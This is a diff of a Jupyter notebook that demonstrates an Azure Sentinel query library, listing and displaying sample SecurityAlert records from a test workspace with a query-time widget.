+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Query:  list_alerts\n",
+      "Data source:  LogAnalytics\n",
+      "Retrieves list of alerts\n",
+      "\n",
+      "Parameters\n",
+      "----------\n",
+      "add_query_items: str (optional)\n",
+      "    Additional query clauses\n",
+      "end: datetime\n",
+      "    Query end time\n",
+      "path_separator: str (optional)\n",
+      "    Path separator\n",
+      "    (default value is: \\\\)\n",
+      "query_project: str (optional)\n",
+      "    Column project statement\n",
+      "    (default value is:  | project-rename StartTimeUtc = StartTime, EndTim...)\n",
+      "start: datetime\n",
+      "    Query start time\n",
+      "subscription_filter: str (optional)\n",
+      "    Optional subscription/tenant filter expression\n",
+      "    (default value is: true)\n",
+      "table: str (optional)\n",
+      "    Table name\n",
+      "    (default value is: SecurityAlert)\n",
+      "Query:\n",
+      " {table} {query_project} | where {subscription_filter} | where TimeGenerated >= datetime({start}) | where TimeGenerated <= datetime({end}) | extend extendedProps = parse_json(ExtendedProperties) | extend CompromisedEntity = tostring(extendedProps[\"Compromised Host\"]) | project-away extendedProps {add_query_items}\n"
+     ]
+    }
+   ],
+   "source": [
+    "qry_prov.SecurityAlert.list_alerts('?')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='run_query'></a>\n",
+    "### Running an pre-defined query\n",
+    "To run a query from our query store we again call <code>QUERY_PROVIDER.DATA_FAMILY.QUERY_NAME(**Kwargs)</code> but this time we simply pass required parameters for that query as key word arguments.\n",
+    "\n",
+    "This will return a Pandas DataFrame of the results with the columns determined by the query parameters. Should the query fail for some reason an exception will be raised."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <th>AlertName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>ProviderName</th>\n",
+       "      <th>VendorName</th>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 06:35:13</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Although none of them succeeded, some of them ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>8af9954d-f28d-40ff-a079-d9d4cc5a5268</td>\n",
+       "      <td>2518385291989119899_8af9954d-f28d-40ff-a079-d9...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>3b701f84-d04b-4479-89b1-fa8827eb537e</td>\n",
+       "      <td>sentineltest</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 06:35:13</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Although none of them succeeded, some of them ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>8af9954d-f28d-40ff-a079-d9d4cc5a5268</td>\n",
+       "      <td>5d60fff6-7dd2-4474-a4d0-4c8e3fa6fad6</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>3b701f84-d04b-4479-89b1-fa8827eb537e</td>\n",
+       "      <td>sentineltest</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 07:02:42</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Azure security center has detected incoming tr...</td>\n",
+       "      <td>AdaptiveNetworkHardenings</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>ba07c315-0af5-4568-9ecd-6c788f9267ae</td>\n",
+       "      <td>b7adb73b-0778-4929-b46a-c0ed642bc61f</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-26 06:03:16</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Azure security center has detected incoming tr...</td>\n",
+       "      <td>AdaptiveNetworkHardenings</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>c3144593-9bae-448e-87dd-b2d3c47de571</td>\n",
+       "      <td>d89ad3b2-f7a7-4cff-b8a4-3f6fa58b4760</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Destination Port\": \"22\",\\r\\n  \"Protoco...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-23 06:42:01</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Azure security center has detected incoming tr...</td>\n",
+       "      <td>AdaptiveNetworkHardenings</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>4e4173a6-1a27-451f-8a3c-25d10b306c30</td>\n",
+       "      <td>11813ab7-ab7c-4719-b0a1-ccb5d4a32223</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 30 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId       TimeGenerated  \\\n",
+       "0  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 06:35:13   \n",
+       "1  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 06:35:13   \n",
+       "2  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 07:02:42   \n",
+       "3  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-26 06:03:16   \n",
+       "4  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-23 06:42:01   \n",
+       "\n",
+       "                                    AlertDisplayName  \\\n",
+       "0                 Suspicious authentication activity   \n",
+       "1                 Suspicious authentication activity   \n",
+       "2  Traffic from unrecommended IP addresses was de...   \n",
+       "3  Traffic from unrecommended IP addresses was de...   \n",
+       "4  Traffic from unrecommended IP addresses was de...   \n",
+       "\n",
+       "                                           AlertName Severity  \\\n",
+       "0                 Suspicious authentication activity   Medium   \n",
+       "1                 Suspicious authentication activity   Medium   \n",
+       "2  Traffic from unrecommended IP addresses was de...      Low   \n",
+       "3  Traffic from unrecommended IP addresses was de...      Low   \n",
+       "4  Traffic from unrecommended IP addresses was de...      Low   \n",
+       "\n",
+       "                                         Description  \\\n",
+       "0  Although none of them succeeded, some of them ...   \n",
+       "1  Although none of them succeeded, some of them ...   \n",
+       "2  Azure security center has detected incoming tr...   \n",
+       "3  Azure security center has detected incoming tr...   \n",
+       "4  Azure security center has detected incoming tr...   \n",
+       "\n",
+       "                ProviderName VendorName                      VendorOriginalId  \\\n",
+       "0                  Detection  Microsoft  8af9954d-f28d-40ff-a079-d9d4cc5a5268   \n",
+       "1                  Detection  Microsoft  8af9954d-f28d-40ff-a079-d9d4cc5a5268   \n",
+       "2  AdaptiveNetworkHardenings  Microsoft  ba07c315-0af5-4568-9ecd-6c788f9267ae   \n",
+       "3  AdaptiveNetworkHardenings  Microsoft  c3144593-9bae-448e-87dd-b2d3c47de571   \n",
+       "4  AdaptiveNetworkHardenings  Microsoft  4e4173a6-1a27-451f-8a3c-25d10b306c30   \n",
+       "\n",
+       "                                       SystemAlertId  ...  \\\n",
+       "0  2518385291989119899_8af9954d-f28d-40ff-a079-d9...  ...   \n",
+       "1               5d60fff6-7dd2-4474-a4d0-4c8e3fa6fad6  ...   \n",
+       "2               b7adb73b-0778-4929-b46a-c0ed642bc61f  ...   \n",
+       "3               d89ad3b2-f7a7-4cff-b8a4-3f6fa58b4760  ...   \n",
+       "4               11813ab7-ab7c-4719-b0a1-ccb5d4a32223  ...   \n",
+       "\n",
+       "                                  ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...   \n",
+       "1  {\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...   \n",
+       "2  {\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...   \n",
+       "3  {\\r\\n  \"Destination Port\": \"22\",\\r\\n  \"Protoco...   \n",
+       "4  {\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...   \n",
+       "\n",
+       "                                            Entities SourceSystem  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...    Detection   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...    Detection   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...    Detection   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...    Detection   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...    Detection   \n",
+       "\n",
+       "                WorkspaceSubscriptionId  WorkspaceResourceGroup  \\\n",
+       "0  3b701f84-d04b-4479-89b1-fa8827eb537e            sentineltest   \n",
+       "1  3b701f84-d04b-4479-89b1-fa8827eb537e            sentineltest   \n",
+       "2                                                                 \n",
+       "3                                                                 \n",
+       "4                                                                 \n",
+       "\n",
+       "                                       ExtendedLinks            ProductName  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...  Azure Security Center   \n",
+       "1  [\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...  Azure Security Center   \n",
+       "2  [\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...  Azure Security Center   \n",
+       "3  [\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...  Azure Security Center   \n",
+       "4  [\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...  Azure Security Center   \n",
+       "\n",
+       "  ProductComponentName           Type CompromisedEntity  \n",
+       "0                       SecurityAlert                    \n",
+       "1                       SecurityAlert                    \n",
+       "2                       SecurityAlert                    \n",
+       "3                       SecurityAlert                    \n",
+       "4                       SecurityAlert                    \n",
+       "\n",
+       "[5 rows x 30 columns]"
+      ]
+     },
+     "execution_count": 11,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "alerts = qry_prov.SecurityAlert.list_alerts(start='2019-07-21 23:43:18.274492', end='2019-07-27 23:43:18.274492')\n",
+    "alerts.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "It is also possible to pass queries objects as arguments before defining keywork arguments. \n",
+    "For example if I wanted to define query times as an object rather than defining a start and end via keywork arguments I could simply pass a querytimes object to the pre-defined query."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "5e8588414e5a4b36823f460350aa735d",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HTML(value='<h4>Set query time boundaries</h4>')"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "d1302e236120441d92d03cffd28a0ca4",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(DatePicker(value=datetime.date(2019, 7, 26), description='Origin Date'), Text(value='23:43:18.2…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "c0f9a5a7d4a3483f87e86baca8d7d399",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(IntRangeSlider(value=(-5, 1), description='Time Range (day):', layout=Layout(width='80%'), max=…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "query_times = mas.nbwidgets.QueryTime(units='day',  \n",
+    "                            max_before=40, max_after=1, before=5)\n",
+    "query_times.display()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TenantId</th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>AlertDisplayName</th>\n",
+       "      <th>AlertName</th>\n",
+       "      <th>Severity</th>\n",
+       "      <th>Description</th>\n",
+       "      <th>ProviderName</th>\n",
+       "      <th>VendorName</th>\n",
+       "      <th>VendorOriginalId</th>\n",
+       "      <th>SystemAlertId</th>\n",
+       "      <th>...</th>\n",
+       "      <th>ExtendedProperties</th>\n",
+       "      <th>Entities</th>\n",
+       "      <th>SourceSystem</th>\n",
+       "      <th>WorkspaceSubscriptionId</th>\n",
+       "      <th>WorkspaceResourceGroup</th>\n",
+       "      <th>ExtendedLinks</th>\n",
+       "      <th>ProductName</th>\n",
+       "      <th>ProductComponentName</th>\n",
+       "      <th>Type</th>\n",
+       "      <th>CompromisedEntity</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-26 06:03:16</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Azure security center has detected incoming tr...</td>\n",
+       "      <td>AdaptiveNetworkHardenings</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>c3144593-9bae-448e-87dd-b2d3c47de571</td>\n",
+       "      <td>d89ad3b2-f7a7-4cff-b8a4-3f6fa58b4760</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Destination Port\": \"22\",\\r\\n  \"Protoco...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-23 06:42:01</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Azure security center has detected incoming tr...</td>\n",
+       "      <td>AdaptiveNetworkHardenings</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>4e4173a6-1a27-451f-8a3c-25d10b306c30</td>\n",
+       "      <td>11813ab7-ab7c-4719-b0a1-ccb5d4a32223</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 06:35:13</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Although none of them succeeded, some of them ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>8af9954d-f28d-40ff-a079-d9d4cc5a5268</td>\n",
+       "      <td>2518385291989119899_8af9954d-f28d-40ff-a079-d9...</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>3b701f84-d04b-4479-89b1-fa8827eb537e</td>\n",
+       "      <td>sentineltest</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 06:35:13</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Suspicious authentication activity</td>\n",
+       "      <td>Medium</td>\n",
+       "      <td>Although none of them succeeded, some of them ...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>8af9954d-f28d-40ff-a079-d9d4cc5a5268</td>\n",
+       "      <td>5d60fff6-7dd2-4474-a4d0-4c8e3fa6fad6</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td>3b701f84-d04b-4479-89b1-fa8827eb537e</td>\n",
+       "      <td>sentineltest</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>b1315f05-4a7a-45b4-811f-73e715f7c122</td>\n",
+       "      <td>2019-07-22 07:02:42</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Traffic from unrecommended IP addresses was de...</td>\n",
+       "      <td>Low</td>\n",
+       "      <td>Azure security center has detected incoming tr...</td>\n",
+       "      <td>AdaptiveNetworkHardenings</td>\n",
+       "      <td>Microsoft</td>\n",
+       "      <td>ba07c315-0af5-4568-9ecd-6c788f9267ae</td>\n",
+       "      <td>b7adb73b-0778-4929-b46a-c0ed642bc61f</td>\n",
+       "      <td>...</td>\n",
+       "      <td>{\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...</td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...</td>\n",
+       "      <td>Detection</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>[\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...</td>\n",
+       "      <td>Azure Security Center</td>\n",
+       "      <td></td>\n",
+       "      <td>SecurityAlert</td>\n",
+       "      <td></td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>5 rows × 30 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                               TenantId       TimeGenerated  \\\n",
+       "0  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-26 06:03:16   \n",
+       "1  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-23 06:42:01   \n",
+       "2  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 06:35:13   \n",
+       "3  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 06:35:13   \n",
+       "4  b1315f05-4a7a-45b4-811f-73e715f7c122 2019-07-22 07:02:42   \n",
+       "\n",
+       "                                    AlertDisplayName  \\\n",
+       "0  Traffic from unrecommended IP addresses was de...   \n",
+       "1  Traffic from unrecommended IP addresses was de...   \n",
+       "2                 Suspicious authentication activity   \n",
+       "3                 Suspicious authentication activity   \n",
+       "4  Traffic from unrecommended IP addresses was de...   \n",
+       "\n",
+       "                                           AlertName Severity  \\\n",
+       "0  Traffic from unrecommended IP addresses was de...      Low   \n",
+       "1  Traffic from unrecommended IP addresses was de...      Low   \n",
+       "2                 Suspicious authentication activity   Medium   \n",
+       "3                 Suspicious authentication activity   Medium   \n",
+       "4  Traffic from unrecommended IP addresses was de...      Low   \n",
+       "\n",
+       "                                         Description  \\\n",
+       "0  Azure security center has detected incoming tr...   \n",
+       "1  Azure security center has detected incoming tr...   \n",
+       "2  Although none of them succeeded, some of them ...   \n",
+       "3  Although none of them succeeded, some of them ...   \n",
+       "4  Azure security center has detected incoming tr...   \n",
+       "\n",
+       "                ProviderName VendorName                      VendorOriginalId  \\\n",
+       "0  AdaptiveNetworkHardenings  Microsoft  c3144593-9bae-448e-87dd-b2d3c47de571   \n",
+       "1  AdaptiveNetworkHardenings  Microsoft  4e4173a6-1a27-451f-8a3c-25d10b306c30   \n",
+       "2                  Detection  Microsoft  8af9954d-f28d-40ff-a079-d9d4cc5a5268   \n",
+       "3                  Detection  Microsoft  8af9954d-f28d-40ff-a079-d9d4cc5a5268   \n",
+       "4  AdaptiveNetworkHardenings  Microsoft  ba07c315-0af5-4568-9ecd-6c788f9267ae   \n",
+       "\n",
+       "                                       SystemAlertId  ...  \\\n",
+       "0               d89ad3b2-f7a7-4cff-b8a4-3f6fa58b4760  ...   \n",
+       "1               11813ab7-ab7c-4719-b0a1-ccb5d4a32223  ...   \n",
+       "2  2518385291989119899_8af9954d-f28d-40ff-a079-d9...  ...   \n",
+       "3               5d60fff6-7dd2-4474-a4d0-4c8e3fa6fad6  ...   \n",
+       "4               b7adb73b-0778-4929-b46a-c0ed642bc61f  ...   \n",
+       "\n",
+       "                                  ExtendedProperties  \\\n",
+       "0  {\\r\\n  \"Destination Port\": \"22\",\\r\\n  \"Protoco...   \n",
+       "1  {\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...   \n",
+       "2  {\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...   \n",
+       "3  {\\r\\n  \"Activity start time (UTC)\": \"2019/07/2...   \n",
+       "4  {\\r\\n  \"Destination Port\": \"3389\",\\r\\n  \"Proto...   \n",
+       "\n",
+       "                                            Entities SourceSystem  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...    Detection   \n",
+       "1  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...    Detection   \n",
+       "2  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...    Detection   \n",
+       "3  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"HostName\":...    Detection   \n",
+       "4  [\\r\\n  {\\r\\n    \"$id\": \"4\",\\r\\n    \"ResourceId...    Detection   \n",
+       "\n",
+       "                WorkspaceSubscriptionId  WorkspaceResourceGroup  \\\n",
+       "0                                                                 \n",
+       "1                                                                 \n",
+       "2  3b701f84-d04b-4479-89b1-fa8827eb537e            sentineltest   \n",
+       "3  3b701f84-d04b-4479-89b1-fa8827eb537e            sentineltest   \n",
+       "4                                                                 \n",
+       "\n",
+       "                                       ExtendedLinks            ProductName  \\\n",
+       "0  [\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...  Azure Security Center   \n",
+       "1  [\\r\\n  {\\r\\n    \"DetailBladeInputs\": \"protecte...  Azure Security Center   \n",
+       "2  [\\r\\n  {\\r\\n    \"Href\": \"https://interflowwebp...  Azure Security Center   \n",
